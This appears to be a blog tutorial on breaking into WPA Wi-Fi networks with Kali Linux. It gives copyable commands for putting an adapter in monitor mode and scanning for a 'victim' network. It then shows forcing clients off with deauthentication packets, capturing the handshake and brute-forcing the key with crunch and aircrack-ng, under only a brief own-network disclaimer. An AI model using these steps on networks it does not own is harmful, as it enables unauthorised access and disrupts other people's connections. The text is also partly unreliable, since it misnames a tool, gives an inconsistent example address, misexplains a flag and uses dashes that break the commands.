WPA Hacking with Kali

Todays topic is for the hackermans among us, or becoming hackermans. The tutorial will be about WALN hacking and brute-forcing!

This Tutorial is only for educational purposes and should only be used at your own network.

Things you need

A laptop/pc or USB-Stick with Kali Linux installed on it. An Wireless adapter with monitoring mode, like this or this. There are also more of them but for this tutorial I will leave it with those two.

I assume you have kali installed on your computer or on an USB. For USB, you can easily do it with LiLI. Just download the distribution here (Choose the right architecture!) and the configuration is straight forward. But be careful not to incidentally delete your system partition.


After the login start a prompt and type:

For Alfa Network AWUS036NHA:

apt-get update && apt-get install firmware-atheros

For Alfa AWUS036ACH:

apt-get update && apt-get install realtek-rtl88xxau-dkms

So now the firmware for the WiFi dongle is installed and is ready to use.

Next, lets install some tools we will be using, depending on your Kali (full or minimal) the tools may be already installed. To install the tools type:

apt-get install aircrack-ng cowparty crunch


aircrack-ng and cowparty is for WIFI brute-forcing, crunch for password generation.


Let’s start with the Basics

Enabling Monitor Mode on your dongle. Plug It in, wait until the LED blinks and enter the following commands:

airmon-ng start wlan0

This will create a wlan0mon as an interface.

It may be that the dongle is not wlan0, just run ip addr and localize your dongle.


Now let’s search for a victim. To scan for victims run airodump-ng wlan0mon.

Lets assume we have a network with the following information: ESSID: bigbear; BSSID: 00:14:6C:7A:41:8; CH:9
The interesting things here are the CH, BSSID, ESSID.

Now you have a victim take a note of the entry’s and run airodump-ng wlan0mon -c {CH} --bssid {BSSID} –w {outputFileName}

So for bigbear it would be:

airodump-ng wlan0mon –c 9 --bssid 00:14:6C:7A:41:81 –w wpastream

now the output will be saved in wpastream.cap in the directory you are right now.


Next we need to Deauthenticate some users to get the handshake. Open a new prompt and type aireplay-ng wlan0mon –deauth 3 –a {BSSID}

-3 means deauth all.

For bigbear it would be:

aireplay-ng wlan0mon –deauth 3 –a 00:14:6C:7A:41:81


Then watch the first prompt at the upper right corner for [WPA handshake]

It will remain empty until you finally caught a handshake. If you caught one press ctrl + C to to stop capturing.


Once you caught a handshake, run wpaclean \path\to\hanshakeFile to clean the handshake file.

In our case i would run: wpaclean wpastream.cap

So we are now ready to go to crack the password. Depending on the password complexity it may take from minutes to hours to crack one.

There are two way of cracking it. The first is with a wordlist the second is hashcracking. In this tutorial I will use a brute-force.

We will use a crunch generated list, just run:

crunch 8 8 | aircrack-ng -e [ESSID] -w – [file path to the .cap file]

the first 8 mean min password length and the second maximum.

For bigbear it will be:

crunch 8 8 | aircrack-ng -e bigbear -w – wpastream.cap

same goes for cowparty:

crunch 8 8 | cowparty –f -- -r wpastream.cap –s bigbear